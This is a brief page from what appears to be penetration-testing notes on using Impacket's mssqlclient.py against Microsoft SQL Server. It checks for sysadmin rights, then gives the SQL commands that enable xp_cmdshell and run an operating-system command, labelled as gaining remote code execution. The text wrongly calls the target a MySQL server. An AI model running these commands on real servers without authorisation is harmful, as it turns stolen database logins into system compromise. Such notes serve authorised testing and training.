Impacket's mssqlclient.py

We can use this tool to interact with mysql server using login credentials and then execute sql quieries.

Check if Current SQL user has sysadmin Privileges

SELECT IS_SRVROLEMEMBER('sysadmin')

Gain RCE

EXEC sp_configure 'Show Advanced Options', 1;
reconfigure;
sp_configure;
EXEC sp_configure 'xp_cmdshell', 1
reconfigure;
xp_cmdshell "whoami"
PreviousImpacket's PsexecNextFirefox Decryptor

Last updated